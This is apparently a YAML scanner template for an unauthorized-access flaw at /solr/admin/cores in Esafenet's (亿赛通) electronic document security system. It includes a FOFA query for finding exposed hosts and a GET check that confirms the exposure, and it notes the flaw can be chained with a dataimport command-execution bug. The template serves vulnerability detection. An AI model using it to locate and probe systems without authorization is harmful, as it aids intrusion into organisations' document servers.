product: 亿赛通-电子文档安全管理系统
vName: 亿赛通-电子文档安全管理系统 cores未授权访问
type: 访问控制
vID: [ ]
level: 3
vDesc: 亿赛通 电子文档安全管理系统 /solr/admin/cores 存在未授权访问，配合dataimport远程命令执行漏洞。
version: ''
note: ''
search:
  FOFA: app="亿赛通-电子文档安全管理系统"
protocol: http
link: ''
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /solr/admin/cores
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - '<str name="name">'
            logic: and